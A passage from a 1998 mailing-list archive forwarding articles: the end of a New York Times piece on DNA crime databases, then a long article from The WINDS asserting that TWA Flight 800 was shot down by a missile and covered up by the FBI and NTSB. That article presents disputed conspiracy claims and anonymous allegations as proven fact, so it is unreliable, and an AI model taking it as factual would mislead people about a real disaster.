"I think the trend is that 10 years from now all felonies will be covered,"
said M. Dawn Herkenham, chief of the FBI's Forensic Science Systems
Unit in Washington. "We recommend that all violent felonies, burglaries,
juveniles and retroactivity for people on parole be included." 

>From his office in Birmingham, England, last week, Werrett said, "Today
we have issued matches on three murders, five rapes, nine serious
robberies, two abductions and two violent burglaries." 

No state DNA data base has acquired the critical mass to furnish such a
hit rate. Many state laboratories are understaffed and have large
backlogs of DNA samples to analyze. The backlogs are particularly
worrisome in the case of rapes where specimens may lie unanalyzed
while the rapist assaults more victims. "People may be appalled to know
how many rape suspect kits are out there untouched," Ms. Herkenham of
the FBI said. 

"The hit ratio depends on whether we can go back and examine all the
evidence that comes in the door," said Dr. Barry Duceman, director of
biological science in the New York State Police Forensic Investigation
Center in Albany. "We are trying to address a crushing case backlog and
to get the technology on line -- you'd be hard pressed to say we are
overstaffed." 

The case backlog problem is compounded because state laboratories are
switching to the STR method of DNA profiling from an older method of
analysis called RFLP (for restriction fragment length polymorphism). All
the samples analyzed by RFLP must be redone by STR if they are to be
searchable in the new data base. 

When these teething problems are overcome, many experts believe that
the state and national DNA data base systems may have a significant
effect, particularly in reducing crimes like rape that often involve repeat
offenders. By scoring a "cold hit" between crime scene data and a
person, DNA data bases can be particularly effective in solving cases
with no suspects. 

"Once we get that infrastructure in place and start getting those hits, the
benefits will lead to higher utilization," Asplen said. 

But like other experts involved with DNA testing, he expressed concern
that DNA profiling be developed in a publicly acceptable way. "The
public does need to have a trust level with this and be assured that law
enforcement is not going to abuse this powerful tool," he said. One
practice likely to raise eyebrows, if not hackles, is mass screening, which
is widely used in the United Kingdom but not yet commonplace here. 

In high profile crime cases, police in Britain often ask, and can require, all
members of a town or building to give DNA samples so as to prove
themselves guiltless and help narrow the search for the culprit. The
National Commission on the Future of DNA Testing is examining under
what circumstances the donation of samples can be considered voluntary.
In an office, where employees who declined to donate a sample might be
fired, a police request for DNA might be coercive. 

A future use of DNA testing is that of phenotypic analysis. It will soon be
technically possible to infer from the genes in a person's DNA many
probable aspects of their appearance, such as hair, skin and eye color.
Werrett said the main problem with such predictions would lie in training
police to understand their probabilistic nature: told there is a 90 percent
chance that the suspect has red hair, investigators should not ignore the
10 percent chance that he does not. 

DNA reveals so much about a person that behavioral geneticists might
wish to search through state data banks for genetic variants linked to
criminal behavior. Most states say their DNA data banks can be
accessed only for law enforcement purposes, like the data bases. But
Alabama authorizes the use of its samples for "educational research or
medical research or development," an apparent invitation to genetic
inquiry. 

An impending issue is whether states should retain their DNA samples
once the information has been entered into the DNA data base. Forensic
managers like to retain samples as a hedge against changing technology.
Others say the DNA sample banks create an opportunity for abuse, and
that if there is another change in technology the government should just
rebuild its data base from scratch. 

Because DNA can be found at so many crime scenes, DNA data bases
promise to be powerful aids in catching criminals. But what thrills forensic
experts tends to chill civil libertarians. 

"The DNA data base started out with pariahs -- the sex offenders -- but
has already been enlarged to include other felons and will probably be
extended to include everyone, giving elites the power to control 'unruly'
citizens," said Philip Bereano a professor of technology and public policy
at the University of Washington in Seattle. 

Dr. Eric Juengst, a bioethicist at Case Western Reserve University in
Cleveland and a member of the FBI's DNA Advisory Board, said the
original policy in setting up the DNA data base was that it was "suitable
only for our most serious category of criminals," and that it would be a
breach of that policy to expand its scope. 

The risks raised by Bereano are worth watching, Juengst said, "but as a
society we have to learn how to control powerful tools of all kinds, like
nuclear power. I don't see it as an endless slippery slope." 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:40:56 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FBI Intentionally Obstructing Justice: TWA800
Message-ID: <199810132157.OAA10011@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: FBI Intentionally Obstructing Justice: TWA800
Date: Mon, 12 Oct 1998 11:25:58 -0500
To: believer@telepath.com

Source:  The Winds
http://www.TheWinds.org/

TWA FLIGHT 800 ANALYSTS SAY FBI IS INTENTIONALLY OBSTRUCTING JUSTICE

"I will probably never watch national
 television news again, and take it at
 face value for the rest of my life." -- Comdr.
 William S. Donaldson

The FBI and the National Transportation Safety Board (NTSB)
intentionally lied to Congress and the public concerning key evidence about
the
downing of Trans World Airlines Flight 800. So indicates recent evidence
brought to light in a tape-recorded conversation with James Kalstrom, the FBI
Special Agent in charge of the disaster investigation.

On that tape, obtained by Accuracy In Media (AIM) Chairman Reed
Irvine, Special Agent Kalstrom is allegedly heard to admit that U.S. Naval
vessels were present in the immediate area where, on July 17, 1996, TWA
Flight 800 was blown out of the sky along with its 230 passengers and crew.
Previously, the federal agencies contended publicly and in testimony before
Congress that the closest military asset other than an unarmed navy
aircraft, a
P-3 Orion, was the USS Normandy, 185 miles away. However, speaking on
condition of anonymity, a reliable source confirmed to The WINDS that the
claims Irvine is making as to the contents of the tape are indeed accurate.

In the recording, the details of which were disclosed privately to a meeting
of Washington's Judicial Watch, Irvine alleges that Agent Kalstrom is clearly
heard to confirm that there were in fact three U.S. Navy vessels within
three to
six nautical miles of the crash site. These ships, according to Kalstrom, were
on a highly classified mission. This information is enormously important
because it greatly strengthens the already formidable position of those
claiming
that a missile strike was responsible for the Flight 800 disaster.

Commander William S. Donaldson, USN Ret., a longtime thorn in the side
of the federal agencies investigating Flight 800, informed The WINDS that he
also has personally heard, and has a copy of, the aforementioned tape
recording. He quotes Special Agent Kalstrom as saying, in reference to
mysterious unnamed radar surface targets the FBI refused to identify, "We
know what they were...they were navy ships on classified maneuvers."

Of the two factions hotly advocating the facts indicating a missile strike,
one
believes it was an errant U.S. Navy anti-aircraft missile launched from those
very ships the FBI and NTSB claims were not present. The other position of
the pro-missile group asserts that the ships were present because the navy
knew that there was a threat of terrorist activity in the area and failed
in an
attempt to intercept the terrorists and thwart the destruction of the
airliner. This
is seemingly corroborated by eyewitnesses who claim to have observed a
previous attempt that failed, only because the vessel launching the
missiles was
too far offshore and out of range. Attempts to locate the craft bearing the
terrorists and their portable missiles were apparently the reason for the
"classified" naval presence in the area. It would also explain the presence
of the
P-3 Orion which is technically a navy sub-chaser but, according to Comdr.
Donaldson, can be used as a reconnaissance platform with its forward-looking
infrared (FLIR) optics and radar.

Comdr. Donaldson claims to also have obtained testimony from several
witnesses, one of whom "is an ex-Navy Bombardier/navigator aboard A6
Intruders, who observed an Aegis Cruiser to the west of the air disaster." An
Aegis is a highly sophisticated Virginia Class guided missile cruiser with
radar
and electronic counter measures (ECM) that would be immensely suitable in
searching for and neutralizing a seaborne terrorist threat.

Because of the highly trained nature of men such as the A6
bombardier/navigator, Donaldson, in his words, considers the identification of
the Aegis Cruiser to be "positive, with 100% credibility."

Interestingly, the USS Normandy, the one warship the navy admits was 185
miles away, is also an Aegis Guided Missile Cruiser of the Ticonderoga Class,
stationed out of Norfolk, Virginia, less than 300 nautical miles away--an easy
and quick journey for the nuclear-powered cruiser.

Either the former A6 crewman has extraordinarily good over-the-horizon
eyesight, or the Normandy (or another Aegis Cruiser) was much nearer the
scene than the navy and FBI are willing to admit.

Much to the dismay and irritation of federal authorities from both the FBI
and the NTSB, the specter of TWA Flight 800 simply will not go away.
Special Agent Kalstrom went on record as angrily denouncing those
responsible for perpetuating American consciousness of the tragedy--and who
disagree with their official position of cause for the disaster: an
internally ignited
center wing fuel tank. Kalstrom is also quoted in Salon Magazineas
arrogantly admonishing that "these people should get a life." [1]

In that article entitled, "The Buffoon Brigade," Salonrefers to those
opposing the government's declaration as to the cause of the crash as a
"motley army".

That "motley army"--the one advised by Special Agent Kalstrom to pursue
a worthwhile existence--is composed of such as:

 Pierre Salinger: 
once Press Secretary to President John F. Kennedy 
former ABC News commentator 

 Admiral Thomas H. Moorer, USN, Retired: 

Former Chairman of the Joint Chiefs of Staff, arguably the most
powerful visible position in America outside the presidency (with
the possible exception of Federal Reserve Chairman) 

 Commander William S. Donaldson, USN Retired: 
Former Navy combat pilot 
89 combat missions over Viet Nam 
Several years as a highly trained aviation accident investigator
and team leader in a dozen or more military crash investigations 

 Richard Russell: 
Former 747 pilot for United Airlines 
Over 26 years experience with the Airline Pilots Association
investigating commercial aviation accidents serving as the Air
Safety Representative for the agency 

 Former U.S. Army Major Fredrick Meyer: 
Army combat helicopter pilot 
Extensive combat extraction experience in Viet Nam with
firsthand witness of thousands of detonations of military
explosives ordinance 
Currently an attorney and Air National Guard helicopter pilot 
First person on the scene of the Flight 800 incident after he and
his copilot witnessed from their ANG helicopter what he says he
would "swear to God, was [exploding] military ordinance"
bringing down the TWA jet.[2] 

"Motley army"? Could it be surmised that many on Salon Magazine's 
staff--and the FBI--would kill (metaphorically speaking) to obtain such a life
as have those men--that is, if intellect and integrity are any longer deciding
factors in the definition of "a life".

With the exception of Fredrick Meyer, who The WINDS has already
interviewed extensively for previous articles on Flight 800, and Adm. Moorer,
this agency spoke at length with each of the aforementioned individuals.

"IT IS VERY CLEAR IT WAS A NAVAL MISSILE"

Pierre Salinger has informed this agency that he is in possession of what he
refers to as "new information that makes it very, very clear it's a naval
missile
[that brought down Flight 800]....and very hot information about the number of
naval ships that were in that area--much more than anybody thought." He said
he was unable, at this time, to share details of that information with The
WINDS, but directed this office to a source which would. The information Mr.
Salinger alluded to, it turns out, is the same as what was revealed on the
aforementioned AIM tape recording.

Mr. Salinger has been the target of innumerable attacks by the media and
the U.S. Government for the position he has taken on the Flight 800 disaster.
"I've been so attacked by the press and everybody else," Salinger told The
WINDS, that he said he would not speak publicly on the TWA matter "until
the government comes out with what they claim to be a solution. If what they
say is something that we do not believe, then I'm definitely going to start
speaking." 

Interestingly, Salinger, and the unofficial truth about the downing of the
TWA jet, are taken quite seriously outside the United States media. In a
previous article, for example, The WINDS quoted The Times of London,a
newspaper of no small reputation, as reporting that "satellite images have
proved FLT 800 was tracked and hit by a sophisticated missile. 'An American
spy satellite positioned over the Brookhaven National Laboratory on Long
Island is said to have yielded important information about the crash. A law
enforcement official told The New York Postthat the satellite pictures show
an object racing up to the TWA jet...and smashing into it.'"

"There was extraordinary information that was being dug up by other news
organizations that was blocked and never ever went to the press," James
Sanders, author of The Downing of TWA 800told this office, "and yet the
most moronic government statement would go to the head of the line in each
and every case."

According to current knowledge there is, it seems, as much firsthand
corroboration that the aircraft was downed by an errant or intentionally
launched missile as there is for the fact that Americans have landed on the
moon. Yet, the obfuscation in which the FBI, NTSB and other federal
agencies are engaged seems to effectively blot that fact from their conscious
thinking.

"That's something very weird," Salinger said, "because at that time, as a
matter of fact, at the top of [Agent] Kalstrom's list was the missile
theory. So
why," Salinger asked, "was he attacking me when I said it was a missile? The
reason he did is that I was talking about a naval missile--that's why. He
himself
was thinking at that time that it was a missile," Mr. Salinger continued. "And
you know there were 350 witnesses that saw the missiles."

When asked if he thought that the media assault on him was orchestrated by
the government he replied, "I don't have any actual facts but I have had
people
tell me that it resulted because the FBI was in touch with the media."

Of the two positions previously mentioned as to the origin of the missiles
that destroyed Flight 800 in the eastern sky that July evening, the one headed
by Comdr. Donaldson holds that the missiles were SA6 SAMs (surface-to-air
missiles) of Soviet origin, launched by terrorists. The other view,
espoused by
Pierre Salinger and James Sanders, et. al., is that the missiles were errantly
fired by the U.S. Navy ships in the vicinity. There is, however, no dissension
between the camps on the fact that irrefutable data points to some manner of
anti-aircraft missile ordinance, whatever its origin, as the source of the
tragedy
and definitely away from the absurdities of, as Sanders puts it, "moronic
government statements".

In his interview with The WINDS Mr. Sanders, expressing his frank
admiration for the former Navy Commander, admitted, "I really didn't have the
ability to get at the things that Donaldson has gotten at." Comdr. Donaldson's
chief logical argument against a failed navy missile test comes from his many
years experience with naval operations. He claims that the navy would never
test fire a missile off the U.S. coast with the capability, should it
malfunction, of
reaching land.

The fact that it is now apparently confirmed that there were, indeed, naval
warships in the near vicinity of the Flight 800 downing should cause
critics to
look more closely at the facts and compare them with what is becoming even
more confused and bewildered government explanations of the incident. But
will this new evidence of a government cover-up make any difference as to
whether the truth will be heard and accepted? This is the haunting question
that
pursues those who are perhaps getting their first real experience into the
power
that the New World Order exercises over information flow.

Their power for creating media stupefaction was vividly presented in the
opening paragraph of a recent Village Voice?article. "In January more than
twenty-five reporters attended the Washington, D.C. press conference,"
Voicecorrespondent Robert Davey reported in July, "--virtually a military
briefing that for all the actual media coverage it received might as well have
been labeled Top Secret. At the widely ignored event retired Navy pilot
Commander William S. Donaldson and former Chairman of the Joint Chiefs of
Staff Admiral Thomas H. Moorer announced that evidence existed to suggest
that a surface-to-air missile brought down TWA Flight 800."

Davey shared, on the syndicated Mike Jarmus radio talk show, that he had
first become interested in the TWA Flight 800 affair "in Christmas of '96
after
Pierre Salinger came out with his charges," he said. "And it struck me as
interesting the way he was greeted with such hostility and so disparaged in
the
media." 

 AS AIRTIGHT AS IT GETS: Commander William
Donaldson pulls the flowers out of the FBI's garden. 

In a stinging letter to FBI Director Louis Freeh, Comdr. Donaldson presents
a most cogent and concise assembly of facts, decimating the government's
position on the cause of the tragedy.

In that document, a copy of which Comdr. Donaldson submitted to The
WINDS, he begins:

 "Considering your New York office's recent abandonment of its
 law enforcement responsibilities, let me refresh your memory and
 provide the following reality check:

 FACTS

In the entire history of American turbine powered civilian
air transport, there has never been an in-flight fuel tank
explosion in any aircraft caused by mechanical failure!
(Laws of probability do not support the NTSB theory). 
Jet A-1 fuel used by FL800 is safer than all its
predecessors. It cannot be made to explode in-flight unless
the tank is first exposed to shock (chemical properties of
the fuel do not support the NTSB theory)." 

Commander Donaldson informed The WINDS of an experiment he had
conducted for Fox Television News and other news organizations in which he
demonstrated by the use of Jet A-1 fuel in a tank at the same vapor
concentration that would have been present in Flight 800's center wing tank
that it could not have exploded as the federal authorities contend. None of
the
footage, Donaldson said, ever made it on the air.

Donaldson continues:

The fuel temperature in TWA 800's center wing tank
(CWT) was well below minimum flammability much less at
explosive vapor temperatures. (Environmental conditions
do not support the NTSB theory). 

There is no source of ignition in the B747 CWT (aircraft
design does not support the NTSB theory). 

Conventionally designed aircraft cannot fly much less
generate lift to climb absent the gross tonnage of fuselage
forward of the wing. (Laws of physical science and
principles of aerodynamics do not support the NTSB
theory). 

The twelve or more explosive chemical residue hits by
BATF's EGIS 3000 equipment are physical evidence of
high explosive involvement. (Leading edge hi-tech forensic
evidence does not support the NTSB theory). 

Testimony from eyewitnesses along eleven nautical miles of
shore front show first sightings of ascending objects that
cross correlate to a launch position well away from
FL800's track. (Eyewitness testimony does not support
the NTSB theory). 

The medical examiners' report shows a uniform
instantaneous cause of death and evidence of high velocity
metal in the cabin. (Post mortem examinations do not
support the NTSB theory). 

The debris field shows that TWA FL800's nose forward
of the wing was shattered after being hit from the left by a
huge force that distributed the gross tonnage as much as
2900 ft. right of the projected aircraft track. (Debris field
evidence does not support the NTSB theory). 

Comdr. Donaldson's letter to Director Freeh continues in considerably more
technical detail with each point followed by the parenthetical summation
ending
with "(...does not support the NTSB theory)."

Other points including those summations are: 

(Ballistic geometry does not support the NTSB theory). 

(The historical record of airframe damage during in-flight
center wing tank explosions does not support the NTSB
theory). 

The forward cabin debris shows through-holes from left
side to right side [those that would have been made by a
high-speed object such as a missile passing through the
747's fuselage]. (The forward cabin debris does not
support the NTSB theory). 

The debris field shows initial cabin integrity was lost, 16
feet forward of the center wing tank at FS800, forward
left hand cargo bay. (The cabin break-up sequence does
not support the NTSB theory). 

Comdr. Donaldson then concludes his list of details, with which he is at
odds with federal authorities, with the pointed comment:

 The FBI has withdrawn before the cause has been determined.
 (The FBI does support the NTSB theory). Why?

Under the heading: "Collusion with NTSB Goals, Suppression of
Eyewitness Evidence" Donaldson continues to flay the FBI director with his
eminently logical analysis of the incident.

 Mr. Freeh I will be candid, the fact that the FBI is now joining in
 lockstep with the NTSB political script sadly was not a surprise
 to me, because of what I had discovered on Long Island. 

 Mr. Kalstrom's agents who 'who turned over every rock ten
 times' failed to tape critical eyewitness testimony, failed to
 establish visual bearing lines from the witnesses who observed
 ascending objects, failed to get elevation measurements, failed to
 get relative motion statements and in some cases failed to even go
 to the observation point, that is except from some eyewitnesses
 who didn't see the missile!...

 Multiple witnesses tell me agents on rare second or third visits to
 persons who saw ascending objects tried to get the witnesses to
 change their original stories? Many of these people are now
 afraid of and disgusted with their own government, the
 administrative mantra "no evidence of criminal act" is turning
 normal American citizens into bitter cynics."

Referring to the FBI's tightly choreographed control and feed of the media
Comdr. Donaldson seems to have no other recourse than to resort to sarcastic
humor in making his point on the ridiculous show produced for public
consumption.

"It was entertaining," Donaldson told Director Freeh, referring to the CIA's
14-minute animated video on the disaster, "but like most cartoons [it] grossly
abused universal laws of nature. Like: Newton's law of gravitation, Newton's
first and second law of dynamics, Newton's' law of hydro-dynamic resistance
and fundamental principles of aerodynamic lift, drag, dynamic stability and
jet
engine mechanics. Other than that," Donaldson cynically observes, "it was a
media masterpiece....Perfect junk science fluff for television."

The former navy commander continues to thoroughly wrap the
extraordinarily flawed FBI investigation in his Gordian Knot of logic as he,
point-by-point, encases the agency and the NTSB within a web of seemingly
inescapable logic. At one point he berates Freeh's organization by telling him
that if his "people had continued the commendable job the county police
started and actually developed witnesses who observed ascending objects, as
they [the county police] were doing, you would have provided the CIA with
data showing the object was moving three times faster than a 747 and was first
sighted close to shore."

Donaldson calls the CIA's "cartoon" a "most outlandish abridgment of
testimony and obstruction of justice" referring to the "amateurish
depiction of
sound analysis which claims that only the sound of the aircraft was actually
heard during the disaster. This, Comdr. Donaldson claims, fails "to consider
the number of explosions heard by witnesses."

Responding to the bizarre assumption that a noseless 747 could continue to
climb another 3,000 feet when it was already just above stalling speed, the
former U.S. Naval aviator asks rhetorically, "why doesn't the New York office
just have the cartoon changed and get the 747 to zoom climb to 30,000
feet...[?] After all, the cartoon's pilotless 747 [pilotless because the nose
section of the fuselage containing the pilots had been sheared off] is
already the
current record holder in the zoom climb category."

To this contention by the FBI and NTSB that the aircraft continued to climb
for another 3,000 feet after losing nearly everything forward of the leading
edge of the wings, the Pensacola News Journalcites Donaldson as saying,
"The final readings show chaos in the sky - with airspeed dropping
instantly by
almost 200 knots, the pitch angle jumping five degrees, altitude DROPPING
3,600 feet in about three seconds, the roll angle going from zero to 144
degrees (the airplane almost inverted), and the magnetic heading changing from
82 degrees [just North of due East] to 163 degrees [just East of due
South]."[emphasis supplied]. By Donaldson's account it appears that only if
one were
standing on their head while evaluating the data, could it have been
misconstrued as the aircraft CLIMBING 3,000 feet.

"'There couldn't have been an aviator at CIA who had anything to do with
that,' Donaldson said, 'They were laughed out of town by pilots.'" [ibid.]

"They [the CIA] failed to address the two 'bright', 'hard', 'high velocity',
'ordinance"' explosions three seconds apart, in addition to the large
petroleum
[fuel] explosion agreed to by witnesses airborne, on land and sea."

Donaldson continues by explaining in detail how the linear scattering of the
747's debris is impossible to explain by any other theory than a high velocity
inertial and explosive impact crossing the aircraft's flight path.

As mentioned before, Comdr. Donaldson's logic seems inescapable and has
not been intelligently refuted in any government press release or document The
WINDS has been able to obtain. With his particularly blunt humor the former
naval officer, under the subheading, "The Train Wreck at 13,700 Feet" makes
the assertion:

 From a physics point of view, TWA FL800, at the time of the
 incident, represented a force of about 465 million foot pounds of
 inertia oriented on a vector of 071 [degrees] at 13,700 ft.

 In order to deflect the gross tonnage of debris to the positions
 found in the field, much of it thousands of feet right of course,
 either the aircraft was hit by an Amtrak metro-liner on the left
 side or by a powerful anti-aircraft weapon.

 Much of the forward fuselage debris is strung out on a
 160-degree axis which closely matches observed eyewitness
 missile intercept angles as well as known fuselage through-holes.

 Because the wind was very light and almost on the tail, the
 maximum windage offset of falling metal debris would be
 approximately an additional 200 ft. downrange. The same offset
 would be nearly universal throughout the field on similar heavy
 debris, but proportionally further for light debris.

 This massive deflection of tons of debris to the right...are absolute
 and irrefutable physical evidence of a massive blow to the
 forward fuselage from the left side.

Comdr. Donaldson then proceeds to confront the FBI director with even
more serious charges. Under the heading of "Obstruction of Justice by
Political
Intercept" Donaldson charges, 

 Mr. Freeh, I am keenly aware of the justice department's
 suppression of the EGIS 3000 high explosive residue evidence
 gathered by BATF. Having consulted with both the equipment
 manufacturer and independent high explosive experts, the picture
 is clear.

Donaldson then explains for Director Freeh that the EGIS 3000, the most
advanced and sensitive state-of-the-art chemical analysis instrument currently
in existence, determined in no less than twelve instances that residue from
the
high explosive PETN was present on parts of the aircraft's wreckage. PETN is
an explosive used in, among other applications, the detonation of
plutonium-based nuclear weapons, as well as some commercial employment.

The flight data recorder apparently presents another critical piece of
evidence pointing to a cover-up. According to a report published by the
Pensacola News Journalin January of this year the NTSB is said to have
explained why the transcript of the last five seconds of Flight 800's data
recorder was cut. They claimed it was a leftover segment from a previous
flight. "'The only reason you put flight data recorders into an airplane at
millions
of dollars' cost,'" the newspaper quotes Commander Donaldson as saying, "'is
to capture this last data line.'"[3]

The explanation given by the NTSB is that the last five seconds were left
over from a preceding flight. The paper quotes TWA pilot Howard Mann as
saying, "not possible - it's erased - there's just no way." [ibid.]

 RADAR TAPE AUTHENTIC - - FBI FRANTIC

Richard Russell, former 747 pilot for United Airlines with twenty-six years
experience in airline accident investigation with the Airline Pilots
Association,
obtained another crucial piece of evidence in the damning mosaic that
describes the last moments of the life of Trans World Airlines Flight 800 and
its occupants. Through undisclosed sources Mr. Russell came into possession
of a copy of the FAA radar video tape of the sky from which the ill-fated jet
fell.

When the FBI discovered that he had it, Russell told The WINDS, they
immediately confiscated it.

"After obtaining a copy of the tape," Russell said, "I studied it--I've worked
with air traffic control problems for years and years and I know what's on
that
tape. I can read it. What was on that tape," he asserts, "was not an
electronic
glitch. This was an unidentified rogue target going some place in a big
hurry--not a ghost target. But it is a definite rogue target that appears
for four
sweeps and then disappears."

A rogue target, Russell explained, differs from a ghost in that the rogue is
very real--just unidentified-- whereas a ghost target is a glitch, an
electronic
artifact that doesn't exist in real life.

"The interesting part about this," Russell added, "is that this target
appeared
just seconds before TWA 800 blows up. The speed of the target during those
four sweeps indicates something that was traveling very fast. They have never
talked about it," Russell elaborates. "They still will not talk about it.
Several
controllers, I'm not sure how many, actually reported that it was a missile."

When The WINDS asked Mr. Russell if he had been able to extrapolate
the speed of the object from the radar images, he declined to share that
data at
this time. He merely stated that "it's faster than any jets that we have
presently
operating except for the Concord, and this was not a Concord."

Russell then makes what, under normal circumstances, would seem an
incredible allegation. Concerning those controllers who claimed they saw a
radar missile track arcing toward Flight 800, "James Hall, the NTSB chairman,
told Barry Valentine--at that time acting head of the FAA--to obtain signed
statements from all the controllers that they were mistaken as to what they
saw. Barry Valentine, as far as I'm concerned, was the only guy in the FAA
who had any guts. He said, 'I won't do it.' None of them signed the statement
and, apparently because of that, Barry Valentine was involuntarily retired."

Author James Sanders is another who has felt the intense displeasure of the
government for his activities in exposing the cover-up of what has become the
most investigated air disaster in history.

Sanders is currently under indictment for receiving stolen wreckage of Flight
800.[4] He is accused of asking a TWA pilot, Terrell Stacey, to obtain
parts of
the aircraft including a piece of seat material from the Flight 800 wreckage,
even though the "hanger man", as Sanders refers to him in his book, testified
that he provided Sanders with the material "of his own volition"--without
being
asked. The government is proceeding with its prosecution of Sanders and his
wife, even in the face of federal case law that gives journalists the right to
request such services.

An interesting study in paradoxical hypocrisy is that Special Agent
Kalstrom, himself, took pieces of the aircraft as souvenirs for certain
people,
according to Sanders, Donaldson and other sources. This was done about ten
days after the incident, Sanders says, which was before anyone knew what
potential investigation value any debris pieces might have. Yet, Kalstrom
suffers no legal problems from his action even though the law, Sanders claims,
clearly defines the act of retrieving such material for souvenir purposes
to be
illegal--while, at the same time, defining Sanders' actions as permissible for
journalists.

"Both my wife and I were in hiding from the FBI and she was under
psychiatric care," Sanders told The WINDS.

Part of what caused the government to go after Sanders and his wife,
Elizabeth, was his insistence that the clearly visible reddish stain that
contaminated row 14 of the TWA jet was, in reality, rocket fuel residue.
Sanders claims that the federal agencies are afraid to do an analysis of the
substance.

"I have a legally tape-recorded conversation with a government official, Dr.
Merrit Burgee," Sanders claims, "who was the senior scientist for the NTSB in
Calverton Hanger [where Flight 800 wreckage is stored]. I have him on tape
admitting that they never intended to find out if my residue was from a
missile
or not. On that tape," the author explains, the chemist "very clearly says
that
several times, and then he gives the very telling statement that 'Boy, if
we had
analyzed it and it came out wrong, then what do we do? We could never put
this thing to bed.'"

The FBI claimed, in March of last year, that the residue was glue. However,
Sanders claims that Charles W. Bassett [the chemist in charge of Flight 800
chemical analysis] agreed to him with a notarized affidavit concluding
"absolutely that the residue the FBI and NTSB were calling glue most certainly
was not."

Sanders claims many witnesses have seen the plain reddish trail left on the
aircraft's seats as something passed through the cabin forward of the
wings. He
also contends that all of the foam rubber from the backs of those seats
that had
the red stains had been mysteriously and purposely stripped away, but none
had ever been submitted for chemical analysis.

Interestingly, Comdr. Donaldson has suffered no harassment whatever for
his most active role in shining the spotlight on government blunders and
cover-ups. This is something he attributes to his extensive, unimpeachable
military record. Because of the multiple references and relationships he
maintains with fleet admirals and CINCPAC (Commander in Chief of Naval
Operations, Pacific) the "footprint" he lays down under that umbrella of
credibility is formidable enough that federal authorities apparently dare
not do
more than just wish he would go away. Others, such as Pierre Salinger and
James and Elizabeth Sanders, have not been so fortunate.

Richard Russell has had his share of government and media aggravation. He
told The WINDS that the FBI made multiple visits to his home attempting to
determine how he obtained that FAA radar tape--the same one they first
claimed was bogus; then admitted it was genuine.

Mr. Russell went on to make some very ominous statements in relation to
the strange manner in which the accident investigation was carried on.

When, according to Russell, the Airline Pilots Association representative,
whose name he declined to disclose, arrived on the scene of the Flight 800
crash, "he was greeted by 500 police officers, several hundred FBI agents and
twenty-three CIA agents."

"He went to the head APA official and asked, 'What the hell is going on
here?' The official said, 'I wondered how long it would take you to figure
this
out.'"

"Normally," Russell continued, "investigators will take their clipboards and
cameras out and record the scene. When any of the investigators attempted to
photograph the area the FBI would forbid it." The APA investigator told
Russell that there were as many as two to six agents shadowing every
investigator, watching every move they made. If one would closely examine a
piece of metal, for instance, and lay it down, it would disappear when the
investigator was not present.

"He also told me that if you would pick up a fragment and call another
investigator over to look at it with obvious interest, an FBI agent would come
over and take it out of your hands and you would never see it again.

"This information comes from somebody on the inside and I cannot reveal
their names to you, but this is what went on there."

Russell said he first got interested in the disaster when the Defense
Department got involved at the outset. "Why is the Pentagon making an
announcement of a civil airplane disaster?" Russell asked himself. "I couldn't
believe that."

"The second thing that occurred to me," Mr. Russell shared, "was why is the
military involving themselves in this immediately? Generally speaking, the
military is brought into an accident investigation only after the civil
authorities
are unable to do the job."

The NTSB is the chief authority in investigating aircraft accidents-- even
above the FBI which, to Russell, made a strange scenario even stranger. "The
night of the disaster the navy provided a DC-9 in Washington and loaded up
the FBI and the navy people--and even though there were seats available, they
would not allow the NTSB Go-Team to ride with them. They had to wait until
the next day. By that time the FBI had taken over and never relinquished
control.

"The most important data is the eyewitness reports. And they would not
even allow them to be interviewed by the NTSB people--only the FBI who
are not qualified to investigate accidents. But in this case they just
blundered
through with brute force and kept everyone at bay."

Any application of normal logic would clearly seem to indicate that this type
of activity portends far more than the government merely covering up the fact
of an errant missile strike.

Another observation can be made concerning the government's attempt to
conceal the truth from the American people and the world at large. Whenever
subterfuge is engaged and the government--or anyone for that
matter--contrives to deceive and cover up essential truth, a reaction takes
place where the truth appears to take on a life of its own. It will not be
buried
or obscured and the more one attempts to do so, the louder and more
obnoxious the truth becomes until, like Poe's "The Tell-Tale Heart," the truth
just keeps beating louder until it must be acknowledged and its opponents
appear insane.

 For nothing is secret, that shall not be made manifest; neither any
 thing hid, that shall not be known and come abroad.--Luke 8:17



 REFERENCES:

 1.Salon Magazine,March 26, 1997.
 2.Pensacola News Journal, January 9, 1998.
 3.[Ibid.]
 4.FBI Press Release: "CONSPIRACY THEORIST AND WIFE, A
 SENIOR FLIGHT ATTENDANT FOR TWA, CHARGED IN
 CONNECTION WITH THEFT OF TWA 800 WRECKAGE".
 5.Commander Donaldson's letter to FBI Director Louis Freeh Page 1,
 Page 2, Page 3, Page 4, Page 5, Page 6, Page 7 


RELATED ARTICLES:
Flight 800 - Why Won't it Go Away?
Witnesses Allege NTSB Covering Evidence of Missile Attack
Commander Donaldson's Flight 800 Report Refutes NTSB

Letter to WINDS about Flight 800 

Copyright (c) 1998, The WINDS. ALL
 RIGHTS RESERVED.
http://www.TheWinds.org 

 Contact The WINDS webmaster.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 14 Oct 1998 06:26:04 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Fw: Every word on the Internet is recorded for ALL time
Message-ID: <199810132157.OAA10023@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Jon Roland <jon.roland@constitution.org>
Subject: IP: Fw: Every word on the Internet is recorded for ALL time
Date: Mon, 12 Oct 1998 17:09:43 -0800
